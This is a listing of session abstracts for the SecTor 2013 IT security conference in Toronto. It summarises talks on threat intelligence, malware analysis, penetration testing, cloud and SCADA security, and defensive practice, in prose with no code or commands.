The presentations and videos from the 2013 conference are currently being processed, and will be posted as they become available..
Online Registration is Closed.
Online registration for our 2013 show is Closed. See you at the conference!
2013 Call for Speakers Closed!
The call for speakers is now closed! Two speaking spots are being reserved for late breaking research...
SecTor Management and the Advisory Committee are bringing to Toronto the world's best speakers in the field of IT Security.
SecTor has been built on providing attendees current, real-world knowledge on the latest attacks and defences required to secure your networks. Be sure to receive our SecTor Newsletter updates so you'll know who's coming to SecTor this year and new events to be announced.
How the West was Pwned - G. Mark Hardy
Can you hear it? The giant sucking sound to the East? With it are going more than just manufacturing jobs -- it's our manufacturing know how, intellectual property, military secrets, and just about anything you can think of. If we're one of the most advanced technological nations on Earth, how are the People's Republic of China (PRC) and others able to continue to pull this off? Why do we keep getting pwned at our own game?
There has been much talk about "cyberwar," but there may not be a war. If a victor can extract tribute from the vanquished, war isn't necessary. Today, intellectual capital is a proxy for tribute. We'll look at some specifics, including who is compromising our enterprises and how they're doing it. We'll also look as some of the geopolitics, and see if maybe North America will survive this onslaught after all.
Crossing the line; career building in the IT security industry - Keynote Panel
Ever crossed the line in order to learn your trade in the security world? Or perhaps is there really a line? A recent study suggests that many of us feel that in order to build our careers in the IT security industry, the line might blur to help us learn. A common thread is that in order to fully understand the attacks and build successful defenses, we need to put ourselves in the shoes of the attackers.
There are numerous codes of ethics for IT Security professionals and we have all heard stories about people who have broken them. However, in building our careers we often wrestle with the best and most effective way of doing something versus what the rule book says. Indeed, there are many that disagree with the rule books entirely.
During this talk, our panelists will be addressing many of the issues and concerns as well as share their experiences and perceptions from the point of view of business owners and security professionals alike.
Gene Kim has been studying high-performing IT organizations since 1999. He is the author of the highly acclaimed "Visible Ops Handbook," "The Phoenix Project: A Novel About IT, DevOps, and Helping Your Business Win," and founder of Tripwire, Inc.
He will be presenting his findings from an ongoing study of how high-performing IT organizations simultaneously deliver stellar service levels and deliver fast flow of new features into the production environment. To successfully deliver against what on the surface appear to be conflicting objectives, (i.e. preserving service levels while introducing significant amounts of change into production), requires creating a highly-coordinated collection of teams where Development, QA, IT Operations, as well as Product Management and Information Security genuinely work together to solve business objectives.
Gene will describe what successful transformations look like, and how those transformations were achieved from a software development and service operations perspective. He will draw upon fourteen years of research of high-performing IT organizations, as well as work he's done since 2008 to help some of the largest Internet companies increase feature flow and production stability through applications of DevOps principles.
Tech it out - Marc Saltzman
If you thought today's tech was cool, to quote '70s rocks Bachman-Turner Overdrive, "baby you ain't seen nuthin' yet." This lighthearted yet informative chat focuses on 10 mind-blowing future technologies worth getting excited about. From wearable tech (like Google Glass) and virtual reality (VR) headsets to flying cars and space tourism to domestic robots and the smart home, this video-heavy chat would serve as an entertaining peek into the near future of consumer technology.
Return of the Half Schwartz FAIL Panel w/Tales from beyond the echo chamber
- James Arlen, Dave Lewis, Mike Rothman and Ben Sapiro
The ugly bastard child of FAIL Panel, in its 2nd year running, a discussion on Malware letters received to our mailbag and other general observations on infosec. We'll disagree, agree, talk over each other, ramble until cut-off, throw things and generally entertain you. Vendor and FUD free since last we last remembered to wear underwear.
Analyzing Exploit Packs: Tips & Tricks - Mohamad AL-Bustami
In this 30 minute session, we will look at tips and techniques that can help malware analysts and Incident Responders perform effective analysis and de-obfuscate/decode malicious exploit code. Primary focus will be on exploit delivery obfuscation and JAR exploit debugging.
It Takes a Village: Reducing the Threat Gap by Allying with Your Competition - Michael A Barkett
With the maturation of IPS and other threat prevention technologies, security vendors have significantly narrowed the patch gap, but is it enough? The rise in APTs has opened a threat gap that most likely cannot be solved without some collaboration among the good guys – even if they are the competition. Learn how organizations utilize global "neighborhood watch" information, and even share intelligence among their industry peers, to better guard their data.
The Threat Landscape - Ross Barrett and Ryan Poppa
The Rapid7 Labs team vigilantly scans the horizon to discover new tactics being used by attackers as well as wide-spread vulnerabilities that must be addressed. The team has uncovered a myriad of important issues including significant configuration issues with serial servers, Amazon S3 storage, UPnP and more. The team is consistently tracking and analyzing malware and botnets to help defenders better understand real-world threats. Join us to head what the Rapid7 team is seeing NOW and what they'll be up to in coming months.
Beyond the Smokers Entrance – Physical Security Assessments in Hardened Environments - Mark Baseggio and Jamie Gamble
This session will discuss conducing physical penetration tests in environments that have some level of security protections. A general framework of social engineering, physical intrusions and practical reviews will be proposed. We will explore how to bypass hard physical security controls, how to conduct comprehensive physical security assessments and how to implement more effective physical defenses.
This talk goes beyond obvious physical security vulnerabilities such as following smokers into a building or asking people to hold doors open for you. In social engineering and physical assessments we often run into environments where significant thought has been put into the security of a site. Explore the common mistakes and bypasses in these implementations and ways to more effectively assess an organization's physical security.
Building a Security Operations Center - Lessons Learned - Yves Beretta
This presentation will go through the various steps required to craft a Security Operations Center; including hiring and managing an array of human resources, monitoring, reporting, and mitigating technology, and covering the definition of repeatable, scalable processes, such as the OODA loop. The presentation will address the fundamental concepts related to training, structuring, and running a 24/7/365 group specialized in threat prevention and mitigation.
This session will highlight how Network Access Control is the ultimate patch checking system. By utilizing a set of key protocols NAC will define and implement a policy that will define the access requirement for devices attempting to access your network. Those policies are designed to look for among other things pre-admission endpoint security policy checks (such as antivirus or even patch levels) and post-admission controls over where users and devices can go on a network and what they can do. Bottom-line we will discuss how NAC might integrate the automatic remediation process (fixing non-compliant nodes before allowing access) into the network systems, allowing the network infrastructure such as routers, switches and firewalls to work together with back office servers and end user computing equipment to ensure the information system is operating securely before interoperability is allowed.
BIOS Chronomancy - John Butterworth
In 2011 the National Institute of Standard and Technology (NIST) released a draft of special publication 800-155. This document provides a more detailed description than the Trusted Platform Module (TPM) PC client specification for content that should be measured in the BIOS to provide an adequate Static Root of Trust for Measurement (SRTM). To justify the importance of 800-155, in this talk we look at the implementation of the SRTM from a vendor's pre-800-155 laptop. We discuss how the BIOS and thus SRTM can be manipulated either due to a configuration that does not enable signed BIOS updates, or via an exploit we discovered that allows for BIOS reflash even in the presence of a signed update requirement.
We also show how a 51 byte patch to the SRTM can cause it to provide a forged measurement to the TPM indicating that the BIOS is pristine. If a TPM Quote is used to query the boot state of the system, this TPM-signed falsification will then serve as the root of misplaced trust. We also show how reflashing the BIOS may not necessarily remove this trust-subverting malware. To fix the un-trustworthy SRTM we apply an academic technique whereby the BIOS software indicates its integrity through a timing side-channel.
Reacting to Cyber Crime: Preserving Crucial Evidence for Law Enforcement - Cpl. David Connors and Sgt. Stéphane Turgeon
Evidence handling is of primary importance for the RCMP Tech Crime Unit Members when called upon to investigate a possible cybercrime. When such an incident occurs, it is important that the IT personnel in place is in a position to clearly identify the potential digital-related evidence and to properly preserve it upon the arrival of the RCMP High Tech Crime Members. This presentation will cover the necessary actions that IT personnel are required to perform under those circumstances as well as the processes to respect when reporting an incident to their RCMP High Tech Crime Unit.
As Virtual Machines (VM's) were the disruptive technology at the end of last century for server and storage platforms, Software Defined Networks (SDN) will be (already is) the first industry-changing, disruptive technology for switch and router platforms in this young century. SDN has already gained grass roots momentum as early adopters Google, Goldman Sachs and Fidelity have announced that they have deployed SDN on their enterprise networks (over a year ago). As this disruptive technology grows and scales, it should be no surprise that cyber security will become the killer app for this new platform.
Join us as we share strategy and tactics on how customers who are upgrading to SDN networks can integrate next generation Advanced Cyber Security protection in their networks and avoid having to retrofit it afterwards…. like we did in the last century.
A CSEC cybersecurity analyst has gone rogue. He has taken a large cache of top secret files that include the names and identities of several secret agents working in foreign countries. This rogue analyst has stowed these files on the internet in an encrypted format and he is now threatening to share the location of the files and the decryption keys with the public. Earlier today, the CSEC cybersecurity analyst narrowly avoided capture at a local cyber cafe, but during his escape, he left behind a USB drive, which contained our only clues thus far...
Does this scenario sound familiar? Would you know how to recover this data?
In this action packed hour, Todd will use various publicly available infosec tools to solve this fictitious infosec mission. Topics and tools will include cryptography, steganography, virtual machines, network and intrusion monitoring and vulnerability exploit tools.
Malware Automation - Christopher Elisan
Automation is key when it comes to production. The same is true for malware. Malware production has moved on from the traditional manual method to a more efficient automated assembly line. In this talk, I will take the audience on an over-the-shoulder look at how attackers automate malware production. Discussion will focus on the tools and methodologies the attackers use to produce thousands of malware on a daily basis. The talk will then conclude with a live demonstration of how malware is produced in an automated fashion.
Big Data Security, Securing the insecurable - Kevvie Fowler
Big data is one of the fastest growing areas within IT. The benefits of big data have been well publicised however little is known about the actual security risks associated with the technology.
This session cuts through the hype and will expose big data security risks, a new class of attack and the practical guidance needed to secure this critical technology.
Many Security Analysts are tasked with assisting in Corporate Governance. This session explores the concept of network forensic investigations using a SIEM, and how security analysts can use it to assist in Governance, HR or law enforcement with network interception to gather evidence that must preserve chain-of-custody. With the challenges of cloud-based computing and mobile devices, the need for well-defined workflow and the use of industry-accepted tools is even more essential than ever. Get familiar with Using integration Commands on-demand to gather external data for an investigation.
How to Connect Security to the Business - Jeanne Glass
When CISOs are briefing their executive teams or boards on the organization's security (usually only when there's a security incident), this is usually the challenge. Distill the volumes of data, assets, silos, operations, threats, and remediations down to a couple of key points. And this is to an audience who typically get their security information from their mobile newsfeed or WSJ. No wonder the average tenure is about 18 months for most CISOs.
How to "Connect Security to the Business" (CSTB), describes the issues and suggests some meaningful ways CISOs, CIOs, and their IT Security teams can effectively communicate security metrics to the business or mission leadership.
RATastrophe: Monitoring a Malware Menagerie - Seth Hardy and Katie Kleemola
Over the last three years, our visibility into the threat landscape of civil society organizations and human rights NGOs has led to a number of discoveries about how various threat actors are engaging in espionage against civilian targets. Attacks in this area are often overlooked by AV and security companies due to the low resources available to civil society for expensive security solutions by big-name vendors.
In this talk, we will describe a few malware families that are actively being developed and used for the purpose of monitoring human rights activists and NGO workers. More importantly, we will cover in detail the ways that the individual threats were found, how they are strongly interconnected, and how they can be likely attributed to a single actor. We will also describe how we do this research as a small group and how civil society groups can protect themselves from threats with minimal resources.
Watching the watchers: hacking wireless IP security cameras - Artem Harutyunyan and Sergey Shekyan
Low cost commodity IP surveillance cameras are becoming increasingly popular among households and small businesses. As of April 2013 Shodan (www.shodanhq.com) shows close to 100000 cameras active all over the world. Despite the fact that there are many models by different vendors, most of them are actually based on the identical hardware and firmware setup. Moreover, there are even other devices (such as Internet TV boxes) that use the similar firmware.
Interestingly enough, those cameras have little or no emphasis on security. In particular, the web based administration interfaces can be considered as a textbook example of an insecure web application. This easily leads to an exposure of not only sensitive personal information (such as wireless network, FTP, and even email access credentials), but also provides an eye inside victim's house. It can be used to alter the video stream with an external stream or a still picture.
Our contribution will cover how those cameras work, as well as how to gain control over a camera in the wild. Furthermore, we will present analysis of security malpractices that that make it possible to harvest sensitive data stored on the camera, as well as to use a camera as an attack platform inside victim's private network. The presentation will conclude with the introduction of toolkit for extracting, altering and repackaging original components of the camera, as well as a live demo during which we will show how a camera (that was set-up following vendors' recommendations and tutorials) can be compromised. Last but not least we will share recommendations on how the setup of the camera can be made less insecure
New application architectures, programmatic languages and frameworks, the (un)availability of exposed platform security capabilities combined with virtual/physical networking and workload mobility are beginning to stress our "best practices" from a security perspective. What are the real security issues (or hype) of Software Defined Networking (SDN) and the vision of the Software Defined Datacenter?
Threat Modeling 101 - Leigh Honeywell
Threat modeling allows developers and security professionals to collaborate and catch vulns before they ship – and potentially before the code is even written. In this hands-on workshop, Leigh will teach the basics of threat modeling using a game called Elevation of Privilege.
Running at 99%, mitigating a layer 7 DoS - Ryan Huber
Application-Level Denial of Service (DoS) attacks are a threat to nearly everyone hosting content on the Internet. DoS attacks are simple to launch, but are often very difficult to defend against. Modern websites are a diverse set of moving parts, and a malicious actor only needs to find the point at which any one of these systems is overwhelmed to bring your website to a halt.
Organizations may approach this problem by increasing capacity, perhaps leveraging the cloud to expand horizontally. This can be a successful short term mitigation strategy, but a combined historic and real-time view of who is accessing your website (and why) gives you the chance to actively defend as opposed to simply absorbing the traffic. Trending this data over time allows your response time to decrease while keeping your front door open. In this talk I will present a new open source project, written primarily in Node.js, that can be used as a defense framework for mitigating these attacks.
MILLION BROWSER BOTNET - Matt Johansen
Information & Risk Mitigation - Neils Johnson
Information is the lifeblood of today's connected world. It plays a critical role in our personal lives and drives our businesses. Each year, the amount of information we create – from digital photos to business critical data – increases exponentially. Securing and managing our information, and the identities to access that information, becomes even more important and challenging. This session will demonstrate Symantec's definition of Risk and address the tension between Security and Availability in an organization. To mitigate that risk, Symantec's vision and focus will be in 3 areas : User Productivity and Protection, Information Security, and Information Management.
Two ongoing industry trends are in conflict with each other. On the one hand, networks are increasingly being consolidated into shared infrastructure utilized by many different clients. From converged hardware networks, through virtualized IT shops, into the cloud, more and more traffic is being merged and intermixed on this shared infrastructure. Conversely, industry regulatory and compliance bodies require that sensitive data, whether it is personally identifiable, financial, or otherwise private, must be segregated and protected with rigorous cryptographic controls. Addressing both of these concerns within the same shared infrastructure is challenging. This talk presents a novel approach for segregating and securing sensitive data on a need-to-know basis, while it is in motion through shared networks, without changing existing network hardware, across any network topology, using industry standard protocols.
Appsec Tl;dr - Gillis Jones
Have you ever wondered what it takes to get one of those "Elusive" bug bounties that people are always snapping up? In this presentation, Gillis Jones will walk you through the fundamentals of the web, and on to the art of hacking the planet. Complete with examples, secrets that the professionals try and keep quiet, and suggestions on "How to Hack"- this presentation aims to bring you to a level of proficiency in hacking the web in less than 60 minutes.
Breaking in is half the battle. I've talked to so many people whose only objective is to try and break into systems. I get that. It's awesome, the rush you get when you bring up that shell. But what then? Ops hardening does not end at the outer shell. Once you're in, you still have to navigate the maze of files, directories, and permissions that is the Linux file system. This talk will cover discovering services, utilizing simple and moderate netcat commands, combining netcat with crontab to create access windows, utilizing /dev/tcp to create a reverse shell, obfuscation to avoid IDS/IPS, and providing examples of tools at each step of the way. Some Linux experience needed. If breaking in is half the battle, staying in wins the war.
Trust No One: The New Security Model for Web APIs - Greg Kliewer
There are many great things about the new world of mobile and cloud applications. They enable us to be more connected and productive in our daily lives, whether it be tracking our exercise with a mobile app, banking on our phones, or seamlessly accessing the same data - whether it be for business or personal reasons - across all of our devices. But for those of us who are tasked with enabling these new experiences for consumers of our organizations' existing services and assets, access from these new platforms present a myriad of new complications. Tops on most list of most enterprises is how to secure access from mobile and cloud applications. In his talk, Greg will introduce the emerging standards for API access control, and provide a few ideas about how to get started providing APIs in a secure way.
Exploiting the Zero'th Hour: Developing your Advanced Persistent Threat to Pwn the Network - Solomon Sonya and Nick Kulesza
Advanced Persistent Threats (APT) and Botnets represent one of the largest security concerns with regards to network defense and exploitation. Most security professionals know about these advanced tools; many people have even discussed the overall concept regarding command and control of networked systems, however, many experts to not yet understand how to create a botnet and establish unhindered command and control to many systems across the Internet. If a security researcher or penetration tester sets out to build a botnet, where do they begin and how do they overcome serious difficulties encountered in the development of their botnet and APT malware? This talk solves these issues by showing exactly how to create a botnet (from scratch), how to build new implants and the master controller to herd all infected systems into one user interface, and includes live demos of Splinter, the Remote Administration Tool (RAT) we created to demonstrate the entire process and release to the community for use. And so what about defense you ask? One word answers this: PWNED!!! As systems continue to be exploited on a daily basis, the end result of this presentation is to show how to build these botnets such that white-hat hackers, penetration testers, red team experts, and computer incident responders can tie this knowledge into implementing better security measures for the protection of our networks.
Swiping Cards At The Source: POS & Cash Machine Security - Ryan Linn and John Hoopes
You put your credit card in, I take your cash out. Point of Sale systems and Cash Machines are frequently targeted but rarely discussed. This talk will be a frank discussion about the types of attacks Ryan and John have both seen and executed against these types of machines, where these systems are vulnerable from physical attacks to network and trojan attacks, and how to proactively deal with the problems.
Ryan and John will focus on current, practical, and frequently seen attacks of both POS systems and systems which dispense cash, because THAT¹S what it's all about.
This talk will cover the current state of the art in .NET reversing, down from PE format of .NET assemblies through various types of obfuscation, and into reversing tools and techniques. Finally, we will explore reversing popular .NET RE tools in an attempt to modify their behavior.
CeilingCat IS Watching You - Shane MacDougall
It shouldn't be news to anyone that people share too much information online. In fact, one major problem that attackers and defenders have is the sheer volume of data that they need to sort through. In this presentation, Shane MacDougall will demonstrate leaked information that can lead to a successful attack, walk through a couple of public profiles in a deep dive of social media presences, and then do a demo of his new OSINT gathering tool, CeilingCat (C2), which can perform wide-scale enumeration of targets, building up sensitive profiles of targets over time.
The benefits of CVE, CWE, MAEC, CWSS, CAPEC, STIX and TAXII can often be at work without the users knowledge. Learn how these standards are working behind the scenes, and how you can use them to support information sharing and gain an advantage from crowd-sourced security information. Prior to 1999, software vulnerabilities were not widely discussed, tracked, correlated, or patched. The Common Vulnerabilities and Exposures list (CVE) was the first to unify such information and provided a key component to being able to talk about software vulnerabilities generically. CVE enjoys broad adoption today, and has achieved de facto standard status. The U.S. Department of Homeland Security (DHS) continues to promote development of additional resources; although these related efforts are less widely known, they can play a role in your security product, service, or benefit as an end-user. This talk will provide an overview of how these standards interact in daily security operations, and show demonstrations of automated security information sharing using these standards.
Build Your Own Android Spy-Phone - Kevin McNamee
Know your enemy! Attendees will see a live demonstration of how we built a proof-of-concept Android Spy-Phone. We will show how we developed the Android spy-phone module and demonstrate how to inject it into legitimate applications to infect unsuspecting victims. We will demonstrate how the spy-phone command and control server can take complete control of the infected phone to steal information, track its location, track SMS and telephone messages, send SMS messages from the phone, and take photos and eavesdrop on conversations without the user knowing. In the BYOD/APT context these capabilities provide a formidable cyber-espionage platform.
Weaponized Security - Kellman Meghu
How dangerous can you get with just the security tools you have today? Do you have access to a technology that makes searching patterns of data in the network very simple? I bet you do. Now I want you to imagine implementing that technology on an open wifi to investigate and monitor, not protect. This talk discusses how a tool to secure people can be turned against them, and the results of random people, leaking data about their computers, and themselves. This is all done with publicly available and commonly implemented enterprise security, just implemented in uncommon ways. PLEASE NOTE: This presentation contains content from a free wifi connection that the users did agree to full release of information in exchange for service, in so much as they clicked accept on a captive portal to get online. You can't say we didn't try to warn them. The data extracted from this network in no way reflects the thoughts, feeling or attitudes of the presenter, and some of it may be offensive in nature. Who knows, maybe you are even in this presentation yourself, have you ever used 'free' wifi?
Data in the Cloud. Who owns it and how can you get it back? - Dave Millier
With the rush to take advantage of all "the Cloud" has to offer, many companies are struggling with the new reality that their data is being sent outside the confines of the corporate environment and being stored in multiple geographic locations. With the Cloud comes the challenge of securing your data, understanding where it is at all times, maintaining the same levels of Roles-based access to data, data retention policies. To further complicate things, a more fundamental question arises: who owns the data once it leaves your corporate network, and in the event of a data loss, how do you get it back? This talk will delve into some of these issues, talk about developing and enforcing policies to help maintain control of your data, and talk about some of the challenges in managing your data once it's out there. We will also present research from a study we conducted with 7 service providers specifically focused on Incident Response in the Cloud, where we set up accounts with the providers, set up identical data stores, simulated a breach which resulted in data being deleted and in some cases modified, and then queried each provider to find out what information they had on what was changed, what information they had on who made the changes, and just as importantly determined whether they were able to assist us in restoring the data to its original state.
In today's increasing open and interconnected enterprise, traditional perimeters are quickly being extended to multi-perimeters to support secure adoption of mobile, cloud, social and information interactions. The traditional network, IT, and end-point security capabilities are being enhanced to support these interactions and similar demands are put on the Identity and Access Management systems too.
In this session, IBM will share the changing security landscape from rapid adoption of mobile, cloud, social and information transformation and the resulting needs to extend traditional Identity and Access Management for the future. This session will also cover an Identity and Access Management maturity model to help organizations and agencies evaluate and address the emerging security and market needs.
Frayed Edges; Monitoring a perimeter that no longer exists - Mark Nunnikhoven
The foundations of traditional network security are crumbling in the public cloud. Old assumptions will leave your cloud deployments vulnerable and exposed. In this talk, we'll examine the existing models of network security and how you can transition to new cloud-friendly models that take advantage of dynamic cloud environments. With the stage set, we'll dive into the details of how to piggyback on cloud deployment and monitoring tools to increase visibility into your cloud deployment to provide you with the awareness you need.
Often Vulnerability Management program managers are missing the mark by focusing on the wrong information, communicating poorly and not understanding the business criticality as it relates to the technical risk found in scanning. This creates a "bad data" scenario where all the data collected is seen to have little or no value – which increases risk and frustration.
This presentation is about lessons learned by studying what goes wrong in the real world with Vulnerability Management programs. More importantly, it discusses how you can build a program that focuses on threat management, security intelligence, risk awareness and patch auditing.
Securing Enterprise Mobility beyond MDM - Danny Pehar and Ali Afshari
Enterprise Mobility offers great challenges and great opportunities. There are a plethora of technologies that are constantly entering and evolving in the market (much of them overlapping) to address the security and manageability related to enterprise mobility (including BYOD). This discussion will focus on demystifying the landscape and to provide perspectives on leveraging Secure Enterprise Access Control as a core technology layer that can serve as a central clearing house to set and ensure effective security policies and manage compliance for all devices whether they are WWAN, WLAN, or LAN based. We will discuss specifically integration points and the technologies they interact with to provide this cohesive and unified way of securing and managing compliance at a contextual level in this rapidly evolving landscape.
The World's Deadliest Malware - Christopher Pogue
This silent threat infects more than 1,000 victims annually. It shows no prejudice, it has no compassion. It comes like an unseen thief in the night to steal. It IS the World's Deadliest Malware.
Point of Sale breaches continue to plague the business world. Credit card data is being stolen in ever increasing numbers with no signs of slowing down. How do these breaches occur? How are targets selected? How does the malware get deployed? What does it do once it gets there? Why does Anti-Virus not catch it? Who is performing these breaches? Why? Does it really have that much of an impact on the business world?
Hear the answers to all of these questions, and much more straight from the front lines field from Trustwave SpiderLabs Director of Incident Response and Digital Forensics, Chris Pogue. Hear how these investigations are conducted, what cutting edge tools and techniques are being used to identify this criminal activity, and actually see the malware at work first hand! (Yes...there is a Demo).
The Bad Boys of Cybercrime - Christopher Pogue
These silent attackers hit more than 1,000 victims annually. They shows no prejudice, have no compassion. They come like an unseen thief in the night to steal. They are, the Bad Boys of Cyber Crime.
Point of Sale breaches continue to plague the business world. Credit card data is being stolen in ever increasing numbers with no signs of slowing down. How do these breaches occur? How are targets selected? How does the malware get deployed? What does it do once it gets there? Why does Anti-Virus not catch it? Who is performing these breaches? Why? Does it really have that much of an impact on the business world?
Hear the answers to all of these questions, and much more straight from the front lines field from Trustwave SpiderLabs Director, Chris Pogue. Hear how these investigations are conducted, what cutting edge tools and techniques are being used to identify this criminal activity, and actually see the malware at work first hand!
Your own pentesting army complete with air support - Philip Polstra
This talk will discuss pentesting with an army of low-powered devices running a custom Linux distro (known as The Deck). The devices are connected via 802.15.4 networking for command and control. The Deck runs on the BeagleBone and BeagleBoard family of devices. An airborne version of The Deck which (along with wireless sensors) is embedded in a flying wing platform will also be presented. All hardware and software (including the flying wing platform) is 100% open source.
BREACH: SSL, Gone in 30 seconds - Angelo Prado and Yoel Gluck
In this hands-on talk, we will introduce new targeted techniques and research that enable an attacker to reliably retrieve encrypted secrets (session identifiers, CSRF tokens, OAuth tokens, email addresses, ViewState hidden fields, etc.) from an HTTPS channel. We will demonstrate that this new compression oracle is real and practical by executing a PoC against a major enterprise product in under 30 seconds – from any modern browser or even an email client. We will describe the algorithms behind the attack, how the usage of basic statistical analysis can be applied to extract data from dynamic pages, as well as practical mitigations. Finally, to provide the community with the ability to build on our research, determine levels of exposure, and deploy appropriate protection, we will release the BREACH tool.
Threats have changed in dramatic and unexpected ways around the world over the past year as attackers continue to hone and evolve their strategies and tactics, and Internet-connected devices proliferate. Using the latest data from hundreds of millions of systems around the world and some of the Internet's busiest online services, this session will provide a unique perspective on the global threat landscape, as well as the specific tactics being used by attackers in Canada. The session includes guidance on what organizations can do to protect themselves in the face of the changing threat landscape.
Pivoting in Amazon clouds - Andrés Riancho
From no access at all, to the company Amazon's root account, this talk will teach attendees about the components used in cloud applications like: EC2, SQS, IAM, RDS, meta-data, user-data, Celery; and how misconfigurations in each can be abused to gain access to operating systems, database information, application source code and Amazon's services through it's API.
The talk will follow a knowledgeable intruder from the first second after identifying a vulnerability in a cloud-deployed Web application and all the steps he takes to reach the root account for the Amazon user.
Except from the initial vulnerability, a classic remote file include in a Web application which grants access to the front-end EC2 instance, all the other vulnerabilities and weaknesses exploited by this intruder are going to be cloud-specific.
The tools used by this intruder are going to be released after the talk and will provide the following features:
FUFW: 5 Steps to Re-architecting Your Perimeter - Mike Rothman
The hype train around next-generation firewalls (NGFW) continues to race forward, but replacing one device with a new shiny object isn't going to ultimately solve the security problem. Securosis analyst Mike Rothman will put NGFW into proper context regarding the evolution of network security and give you 5 steps to move your perimeter protection forward.
Vulnerability analysis of 2013 SCADA issues - Amol Sarwate
This session is result of a yearlong study of the most recent SCADA vulnerabilities and includes root cause analysis, attack vector scrutiny, consequence of successful attack and remediation study. Attendees will get an insight into the factors that resulted in the nature and magnitude of the harmful outcomes in order to identify what actions need to be taken to prevent recurrence of the same.
Jackson Shaw will take the audience thru the state of Identity & Access Governance and why having an IAG strategy is key to security for corporations big and small. He will also highlight how, in today's rapidly changing environment of APTs, foreign intrigue & hacking why even with a strong IAG strategy you will still be open to potential security breaches. Jackson will also provide some background on the importance of marrying software (IAG) and hardware (next generation firewalls) presents a new shield against these threats.
In this seminar, Ajay K. Sood will:
How they get in and how they get caught - Schuyler Towne
This talk will take you through the basics of how to pick, rake, bump, impression and bypass a lock, but be careful, you're leaving a lot of evidence behind. Using datagram's work at lockpickingforensics.com as a jumping off point we'll explore how a picker gets in, and how, with careful observation and some practice, we can uncover their method of entry. Using macro photography, illustrations and a few anecdotes I'll give you a basic education in several entry techniques and a primer in lock forensics.
Fiber Channel – Your OTHER Data Center Network - Rob VandenBrink
The majority of large datacenter storage architectures in the world are currently based on Fiber Channel networks. Unfortunately, the emphasis on security, compliance, and audit remains on hosts and traditional Ethernet networks, leaving the Fiber Channel behind as "a storage thing" that for some reason is never secured. Abdicating this responsibility leaves the Fiber Channel network open as a conduit for unfettered, unmonitored recon and theft of data, without regard for security zones you may have defined on your IP network.
In this presentation we'll explore commonly overlooked security settings in Fiber Channel security, how to audit, pentest, or attack fiber channel, and more importantly, how to secure your Fiber Channel network. Live demos of methods and tools are (of course) part of this presentation.
Information security today has evolved into a big data arms race. As vendors create ever more elaborate and sophisticated systems to flag and investigate abnormal events, the huge amounts of log data is driving up costs for storage, processing, software and network transport. A more effective, less costly information security approach is to protect information using encryption in-flight and at the communications endpoints. This shift can also help organizations immediately identify if information has been compromised. This approach also lends itself well to use in Infrastructure as a Service cloud environments.
Fortifying Canada's Cyberspace: Together - John Weigelt
The foundation of Canada's economy is increasingly dependent of the digital infrastructure that supports all sectors of industry. Confidence in this infrastructure is essential if individuals and businesses are to harness the opportunities it presents. Maintaining this confidence is a complex challenge, especially in face of continually evolving threats. Staying ahead of the threats to Canada's cyber infrastructure requires a collective effort, bringing together a variety of public and private sector communities to address the various elements that are critical for a cohesive strategy and complementary actions. John Weigelt, National Technology Officer Microsoft Canada will explores the connections between Canada's economic prosperity and cyber security. Join John as he also investigates the variety of communities working collectively to maintain and grow the assurance in Canada's cyber infrastructure.
The polymorphic nature of malware, failure of signature-based security tools and massive amounts of data and traffic flowing in and out of enterprise networks is making threat management virtually impossible using traditional approaches without copies, samples or details how can one possibly prevent, contain and inform on targeted attacks? This session will demonstrate how to use big data and science to uncover needles in a haystack. They speaker will explain role that data, traffic, and telemetry analysis, as well as graphing, can play in extracting security intelligence about zero day threats.
Today's Cyber Threat Landscape – Prevention is no cure - Lucas Zaichkowsky
AccessData will talk about Today's Cyber Threat Landscape - The traditional cyber security infrastructure is riddled with blind spots… open doorways for threats you can't see, because the tools you're relying on can't see them We will discuss how to eliminate those blind spots, allowing you to catch the data leakage your DLP misses, detect the new malware your IDS and antivirus don't recognize, and even monitor Internet activity of employees when they are not logged into your network. The session will highlight how you can leverage all current investments to optimize risk reduction using a single integrated platform. Why use 7 agents when 1 will suffice?
For a synopsis of previous year sessions and events, we invite you to visit our Past Events page.